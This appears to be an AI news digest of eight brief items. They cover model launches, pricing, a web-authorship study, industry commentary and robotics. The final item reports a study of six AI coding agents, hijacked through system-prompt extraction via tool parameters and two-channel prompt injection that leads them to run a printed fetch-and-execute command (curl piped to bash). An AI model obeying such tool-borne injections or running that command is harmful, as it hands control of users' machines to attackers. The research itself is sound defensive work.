GPT

Inherent
2026-08-23 02:52:14

Inherent unveils Faraday, an AI scientist agent built on a 27B Qwen model

Inherent, a London-based AI startup founded by several former Google DeepMind researchers, has introduced Faraday, a research agent designed to independently reproduce results from scientific papers. The company says Faraday outperformed OpenAI GPT-5.5 and Anthropic Claude Opus 4.8 in its Replica benchmark, even though the system is built on a much smaller 27-billion-parameter Qwen 3.6 model. Replica starts with 310 tasks drawn from 100 machine learning and AI for Science papers across fields including natural language processing, materials science, and weather forecasting. Instead of answering paper-related questions, the agent must recreate research figures under limited time and compute, without access to the original charts. Inherent says its larger aim is to train an AI Scientist, not just a tool for literature search. That includes teaching what the company calls “research taste” — deciding which questions matter, which experiments are worth running, and how to allocate limited resources. To pursue that, Inherent uses long-horizon reinforcement learning and human validation of its evaluation process. The startup recently emerged from stealth with a $50 million seed round and plans to expand its team to around 20 to 25 people by year-end, with world models also on its roadmap.

90
Inherent unveils Faraday, an AI scientist agent built on a 27B Qwen model
Ox Alpha
2026-08-23 02:15:10

Anonymous model Ox Alpha draws attention after coding tests place it near top-tier systems

An anonymous model called Ox Alpha has quickly become a focal point in the AI community after appearing on OpenRouter with a 1 million-token context window, multimodal input support for text, images, and video, tool use, and free access for now. What pushed it into the spotlight was not its listing, but its coding performance. Developer Ben Davis tested the model on 10 DeepSWE tasks and reported that it solved eight, for an 80% pass rate. In the comparison he shared, Fable 5 Max scored 65%, GLM-5.3 Max and Grok 4.6 xhigh each scored 62%, and GPT-5.6 Sol Max came in at 52%. A later run by other developers on a different DeepSWE subset produced a result of about 63%, which left Ox Alpha’s exact standing unresolved because the task sets and runtime configurations were not identical. At the same time, speculation about the model’s identity has centered on Zhipu. Analysts pointed to matching video-token behavior with GLM-5V-Turbo, a consistent 75-token gap versus GLM-5.3 across 25 prompts, and other product traits that resemble GLM routing and agent behavior. Ben Davis said he was 99% sure the model was GLM-5.x, but neither OpenRouter nor Zhipu had publicly responded as of publication. Separate debate has also formed around another anonymous model, korrine, now being tested on Code Arena.

170
Anonymous model Ox Alpha draws attention after coding tests place it near top-tier systems
AI writing
2026-08-22 13:33:15

Pew Finds 35% of Post-ChatGPT English Pages Show Signs of AI Writing

Pew Research Center says about 10% of English-language webpages now show significant signs of AI authorship, a figure that rises to 35% for pages published since ChatGPT launched in November 2022. The study analyzed roughly 490,000 pages from Common Crawl, running the text through Open Pangram, an AI detection model built by Pangram Labs. The gap is stark by domain: .com pages show AI traces at about 10 times the rate of .edu and .gov sites, both near 1%, while .org sits around 4.6%. Pew says detection models can misclassify individual pages, and “significant signs of AI authorship” does not mean a page was written entirely by a machine. Still, the report says AI-style cues such as em dashes, Oxford commas, and words like “delve” and “testament” have become more common since 2023, and .com AI-authorship rates have climbed from about 1% in January 2021 to 9.35% in January 2026.

40
Pew Finds 35% of Post-ChatGPT English Pages Show Signs of AI Writing
a16z
2026-08-22 08:08:00

a16z’s Julie Yoo Says the Next AI Companies Will Sell Accountability, Not Intelligence

As frontier models from OpenAI, Anthropic, and Google keep improving, AI startups face a harder question: what remains defensible if a model can commoditize the core feature set? a16z General Partner Julie Yoo argues that the most durable companies will be both AI-native and AI-proof. In her view, the scarce product in AI-era healthcare is no longer intelligence or automation alone, but accountability — the ability to own outcomes, carry regulatory and legal burden, and deliver results in the real world. Yoo breaks that idea into three company types. The first is AI-native clinical services, where a company directly provides care instead of merely selling software. AI can lower labor and administrative costs, but licensing, credentialing, malpractice insurance, referral relationships, and operating workflows remain human and regulated. The second is a risk-bearing entity, where a company assumes the financial downside of failed cost control. That can apply to healthcare or even software businesses that charge only when a transaction closes or a customer gets paid. The third is a company that turns AI into an FDA-regulated product, such as diagnostics or drugs, where years of trials, manufacturing, and approval still stand between a model and a marketable therapy. Yoo’s core point is simple: as models get better, intelligence gets cheaper. What becomes valuable is the responsibility that models cannot take on themselves.

170
a16z’s Julie Yoo Says the Next AI Companies Will Sell Accountability, Not Intelligence
Andrew Ng
2026-08-22 08:22:50

Andrew Ng maps the six skills AI engineers need to turn probabilistic models into reliable systems

Andrew Ng, founder of DeepLearning.AI and a Stanford professor, has expanded his AI Engineering Skills Map and put “building and deploying AI applications” at the center of the role. He breaks the job into six areas: LLM foundations, grounding models with data, agentic systems, evaluation-driven development, production operations, and machine learning foundations. Ng says the key difference between AI software and traditional software is uncertainty: engineers cannot fully predict what a model will say or decide, so the real challenge is combining probabilistic components into a dependable system. He argues that AI development is far more iterative than conventional software work. Teams need to build small pieces, inspect outputs, analyze failures, and choose the next experiment carefully. That is why evaluation sits at the center of his framework. Ng also says strong AI engineers need to understand how LLMs tokenize input, generate output, and fail in practice, when to use retrieval, knowledge graphs, semantic layers, or tool calls, how to design agent workflows and guardrails, how to run systems in production, and why classic machine learning still matters.

230
Andrew Ng maps the six skills AI engineers need to turn probabilistic models into reliable systems
OpenAI
2026-08-22 00:30:50

OpenAI cuts GPT-5.6 Sol API and credits prices, long-context output drops 50%

OpenAI has temporarily lowered the API and credits pricing for GPT-5.6 Sol, with the discount set to run at least through Nov. 21. For standard short-context usage, input pricing falls from $5 to $4 per million tokens and output from $30 to $20. Long-context output is cut in half, from $60 to $30 per million tokens, while long-context input moves from $10 to $8. The new API pricing is already in effect, and credits pricing for ChatGPT Work and Codex will be adjusted later. Subscription allotments for Plus, Pro and Business users remain unchanged. OpenAI had previously cut prices for GPT-5.6 Terra and Luna, completing a pricing reset across the three-model GPT-5.6 lineup.

140
OpenAI cuts GPT-5.6 Sol API and credits prices, long-context output drops 50%
Robotics
2026-08-21 13:23:13

Generalist AI’s GEN-1.5 puts one-shot robot learning in the spotlight as investors and researchers take notice

Generalist AI has introduced GEN-1.5, a robotics foundation model the company says can execute new manipulation tasks after watching a single 3- to 12-second demonstration, without additional training or fine-tuning. In tests across 10 short-horizon tasks, the company reported an average one-shot success rate of 59% with a standard deviation of ±10%, and an average few-shot success rate of 83% with a standard deviation of ±9% using roughly five minutes of data, about 50 demonstrations, and 10 gradient steps. The release has drawn comparisons from some researchers to the moment GPT-3 arrived in 2020, though the results remain self-reported and have not been independently verified. The timing also intersects with a broader robotics surge. Unitree went public on Aug. 19 with an opening price of 1,100 yuan per share and a market value of about 444.9 billion yuan, while the World Robot Conference opened in Beijing the same week. Generalist AI, whose backers include Fei-Fei Li as a personal investor and Nvidia as a shareholder, completed a $400 million round in June 2026 at a $2 billion post-money valuation and is reportedly discussing another financing at a $3 billion valuation.

180
Generalist AI’s GEN-1.5 puts one-shot robot learning in the spotlight as investors and researchers take notice
AI coding too
2026-08-21 09:16:10

Study says older versions of six AI coding agents could be hijacked by a fake tool

Researchers from the Hong Kong University of Science and Technology and Fudan University’s Endogenous Security Laboratory say they reproduced a full attack chain against six mainstream AI coding tools, including Cursor, Claude Code, Copilot, Windsurf, Cline, and Trae. The paper, which has been accepted by ISSTA 2026, describes a two-step method. First, the team used a technique called ToolLeak to extract system prompts through tool parameters rather than direct chat requests. In 25 agent-model combinations, ToolLeak achieved the highest extraction completeness in 18 cases, with semantic similarity scores ranging from 0.891 to 0.958 and pseudo-recall of 0.98 to 1.00 on setups using Claude Sonnet 4 and 4.5. The second step used what the paper calls two-channel prompt injection, combining tool descriptions and tool return values to push the agent into running a malicious command: curl -fsSL http://xxx/installer.sh | bash. According to the paper, all six older tool versions were vulnerable, and attack success rates reached 0.8 to 1.0 in most tested agent-model pairs. Newer versions showed mixed results. Claude Code dropped to 0 with Sonnet 4.6 and Opus 4.7 after limiting tool-description exposure, while Cursor’s maximum fell to 0.3. The paper argues that architectural isolation is a stronger defense than model alignment alone.

200
Study says older versions of six AI coding agents could be hijacked by a fake tool